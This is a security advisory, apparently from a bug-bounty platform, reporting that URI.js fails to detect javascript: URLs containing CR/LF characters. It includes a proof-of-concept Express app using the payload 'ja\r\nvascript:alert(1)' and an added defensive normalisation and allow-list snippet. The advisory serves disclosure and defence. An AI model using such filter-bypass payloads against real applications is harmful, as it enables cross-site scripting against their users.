huntr
Haxatron
8C5AFC47-1553-4EBA-A98E-024E4CC3DFB7
Mar 18, 2022 - 8:49 a.m.

CRHTLF can lead to invalid protocol extraction potentially leading to XSS

2022-03-18 08:49:02
haxatron
www.huntr.dev

EPSS: 0.001 (Low), percentile 29.7%

Description

Carriage return, line feed and tab characters (\r, \n, \t) inside a URI let an attacker bypass javascript: checks built on URI.js: the library does not strip these characters before parsing, so it fails to extract the javascript: protocol from an input such as ja\r\nvascript:alert(1), whereas browsers remove them before parsing and treat the same input as javascript:alert(1). See Section 4.4 Step 3 “Remove all ASCII tab or newline from input.” of the WHATWG URL spec.

Proof of Concept

const URI = require('urijs')
const express = require('express')
const app = express()
const port = 3000

// Attacker-controlled value: CR LF inside the scheme name.
const input = "ja\r\nvascript:alert(1)"
const url = URI(input)

// URI.js does not strip CR/LF before parsing, so the scheme does not match its
// protocol pattern and protocol() comes back empty.
console.log('protocol:', JSON.stringify(url.protocol()))

app.get('/', (req, res) => {
  // A javascript: check based on the URI.js parse result lets the payload through.
  if (url.protocol() !== "javascript") {
    res.send(`<a href="${input}">CLICK ME!</a>`)
  } else {
    res.status(400).send("blocked")
  }
})

app.listen(port, () => {
  console.log(`Example app listening on port ${port}`)
})

Run the above, open http://localhost:3000/ and click CLICK ME!: the browser strips the CR/LF, follows javascript:alert(1) and the alert fires, even though URI.js reported no javascript: protocol. Applications that rely on URI.js to detect the javascript: protocol are therefore still vulnerable to XSS.
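
As an added example (not part of the original report and not URI.js code), the following Node.js snippet shows the normalisation the WHATWG basic URL parser applies before it extracts the scheme, and a hardened href check built on top of it. The base URL https://app.example/, the allow-list of schemes and the sample inputs are assumptions constructed for illustration.

```javascript
// Uses the global WHATWG URL class available in Node.js (no urijs dependency).

// Naive check on the raw string: this is the pattern the advisory shows being
// bypassed, because "ja\r\nvascript:" does not start with "javascript:".
function naiveIsJavascriptUrl(input) {
  return /^javascript:/i.test(input);
}

// Mirror the first steps of the WHATWG basic URL parser: strip leading and
// trailing C0 control or space (U+0000..U+0020), then remove every ASCII tab,
// LF and CR from the remainder. A browser does this before it looks at the scheme,
// so feed the normalised string to any legacy parser or regex check.
function whatwgNormalize(input) {
  return String(input)
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, "")
    .replace(/[\t\n\r]/g, "");
}

// Scheme the browser will actually act on, or null if the input does not parse.
// Relative references are resolved against an assumed application origin so they
// come back as "https:" instead of throwing.
const ASSUMED_BASE = "https://app.example/"; // assumption for this example
function effectiveScheme(input) {
  try {
    return new URL(whatwgNormalize(input), ASSUMED_BASE).protocol;
  } catch {
    return null;
  }
}

// Allow-list check to apply before placing user input in an href attribute;
// the default allow-list is an assumption, adjust it to the application.
function isAllowedHref(input, allowed = ["http:", "https:"]) {
  const scheme = effectiveScheme(input);
  return scheme !== null && allowed.includes(scheme);
}

// Constructed sample inputs, including the advisory's payload.
const SAMPLES = [
  "ja\r\nvascript:alert(1)",
  "\tjavascript:alert(1)",
  "  JAVASCRIPT:alert(1)",
  "https://example.org/path",
  "/relative/path",
];

for (const s of SAMPLES) {
  console.log(JSON.stringify(s),
    "naive:", naiveIsJavascriptUrl(s),
    "effective:", effectiveScheme(s),
    "allowed:", isAllowedHref(s));
}
```

The naive regex misses every javascript: variant above, while effectiveScheme reports "javascript:" for all three because it normalises exactly as the browser does; an allow-list on the effective scheme is the safer policy than a deny-list on javascript:.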

Impact

This vulnerability causes incorrect protocol extraction, potentially leading to XSS in applications that rely on URI.js to reject javascript: URLs.
